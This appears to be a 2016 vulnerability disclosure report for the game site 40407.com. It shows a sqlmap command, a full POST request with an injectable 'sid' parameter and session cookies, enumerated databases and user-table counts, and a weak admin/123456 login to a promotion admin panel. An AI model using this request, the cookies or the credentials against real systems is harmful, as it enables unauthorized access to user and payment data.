Game security: SQL injection at one point on the 40407 game site (affects about 500k user records) + weak password on one system

Vulnerability title: Game security: SQL injection at one point on the 40407 game site (affects about 500k user records) + weak password on one system
Vendor: 40407.com
Author: 黑色键盘丶
Submitted: 2016-04-28 09:09
Published: 2016-06-12 11:00
Vulnerability type: SQL injection
Severity: High
Self-rated rank: 20
Status: Confirmed by vendor
Tags: PHP + numeric injection, injection technique

Vulnerability details

POST-based injection. Command used: sqlmap.py -r 1.txt --dbs; injected parameter: sid

=====================post_package========================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D

name=heise123&gid=5&sid=32&isyk=

Database information

available databases [25]:
[*] `14x`
[*] `399wantg`
[*] `40407box_test`
[*] `40407box`
[*] `40407boxpt_test`
[*] `40407boxpt`
[*] `40407boxstat`
[*] `40407data`
[*] `40407kfz`
[*] `40407lol`
[*] `40407tqyt`
[*] `dkwdv {`
[*] `kp.ya58.cn`
[*] `s} \x1a!\x03!`
[*] `ucentir)\x11`
[*] `xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*] 团

Tables in the current database

Database: 40407boxpt
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| box_game_tg_data     | 761184  |
| box_game_member      | 450339  |
| box_gamecard_sn      | 280019  |
| box_pay              | 22280   |
| box_score_record     | 4632    |
| box_score_playinfo   | 4016    |
| box_member_mac       | 3041    |
| box_content_1        | 2220    |
| box_content_1_extend | 1900    |
| box_score_rule       | 1306    |
| box_pk_username      | 1074    |
| box_game_server      | 650     |
| box_content_1_item   | 576     |
| box_jf_pay           | 479     |
| box_tag              | 236     |
| box_admin_user       | 227     |
| box_score_game       | 160     |
| box_content_1_sjsg   | 139     |
| box_score_pay        | 139     |
| box_category         | 131     |
| box_content_1_jjsg   | 125     |
| box_content_1_sjtl   | 90      |
| box_content_1_hero   | 67      |
| box_content_1_zwx    | 67      |
| box_content_1_nslm   | 55      |
| box_model            | 35      |
| box_model_field      | 35      |
| box_game             | 34      |
| box_content_1_rxsg2  | 32      |
| box_content_1_jyjh   | 29      |
| box_content_1_ocean  | 26      |
| box_content_1_hwsg   | 25      |
| box_content_1_mycs   | 25      |
| box_user_tg          | 24      |
| box_pay_cycle        | 23      |
| box_linkage          | 18      |
| box_ad               | 16      |
| box_content_1_jyjx   | 16      |
| box_pk_game          | 13      |
| box_pk_number        | 13      |
| box_content          | 12      |
| box_gid_modelid      | 10      |
| box_pingtaibi_fanli  | 10      |
| box_pk_rule          | 10      |
| box_content_1_bztx   | 8       |
| box_plugin           | 6       |
| box_content_1_smzt   | 5       |
| box_member_group     | 5       |
| box_admin_group      | 4       |
| box_content_1_jz     | 4       |
| box_content_1_rxsg   | 4       |
| box_role             | 4       |
| box_content_1_mjll   | 3       |
| box_wan_top_gg       | 3       |
| box_content_1_dsg    | 2       |
| box_content_1_game   | 2       |
| box_content_1_swydn  | 2       |
| box_content_1_xbjz   | 2       |
+----------------------+---------+

Database: 40407boxpt (about 450k user records)
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| box_game_member | 450339  |
+-----------------+---------+

More than 200,000 game-card key records, 70-plus other sets of information, payment records and so on. Because this is a time-based (delayed) injection, the data itself was not dumped.

================================================================================

http://tg.40407.com/admin/mainindex/index logs in with admin / 123456. From there the games' promotion information can be modified.

Some of the user information

Proof of vulnerability: the same sqlmap request, database list and table counts as in the details section above.